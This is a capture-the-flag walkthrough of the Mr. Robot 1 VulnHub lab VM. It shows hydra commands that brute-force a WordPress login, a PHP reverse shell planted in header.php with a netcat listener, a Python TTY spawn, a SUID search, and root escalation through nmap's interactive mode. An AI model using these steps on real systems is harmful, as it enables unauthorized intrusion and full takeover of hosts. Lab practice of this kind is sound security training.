This is my writeup for the Mr. Robot 1 VM from vulnhub.com, based on the show Mr. Robot. The VM has three keys hidden in different locations, and the goal is to find all three. Each key is progressively harder to find.
The VM isn't too difficult: there is no advanced exploitation or reverse engineering, and the level is considered beginner to intermediate.
When we access the IP of the VM on port 80, we see something that looks like a website.
The goal is to find the three hidden keys, so let's start scanning:
I run my own recon script, which contains nmap and nikto:
Nikto found the robots.txt:
$ curl http://__IP__/robots.txt
Content of robots.txt:
User-agent: *
fsocity.dic
key-1-of-3.txt
And that's the first key:
$ curl http://__IP__/key-1-of-3.txt
Nikto also found a WordPress instance and a dictionary. Using hydra we brute-force the user and the password.
Find a matching user using fsocity.dic:
hydra -vV -L fsocity.dic -p password __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Find a matching password using fsocity.dic:
hydra -vV -l elliot -P fsocity.dic __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
With these credentials we're able to log in to the WordPress installation.
Placing a reverse shell
I logged into WordPress and put an edited version of the PHP reverse shell (rev_shell) into header.php.
I then started a listener on port 42 on my local machine.
nc -lvp 42
Then I triggered the reverse shell and waited for it to connect:
Connection from __IP__ 42814 received!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 11:29:01 up 11 min,  1 user,  load average: 0.00, 0.03, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
robot    tty1                      11:21    7:36   0.07s  0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$
Fiddled around... then I found and read /home/robot/password.raw-md5.
Then I spawned a TTY shell using Python:
python -c 'import pty; pty.spawn("/bin/sh")'
robot@linux:~$ ls
ls
key-2-of-3.txt  password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
And that's key 2:
Now we obviously need to get root. We start by searching for binaries with the SUID bit set:
find / -perm -4000 -type f 2>/dev/null
robot@linux:/$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
This looks like an old version of nmap, and old versions have that cool feature called interactive mode. Since the binary is SUID root, the shell it spawns runs as root:
nmap --interactive
nmap> !sh
Now we're root. Let's read the final key.
I didn't know about the interactive mode of nmap.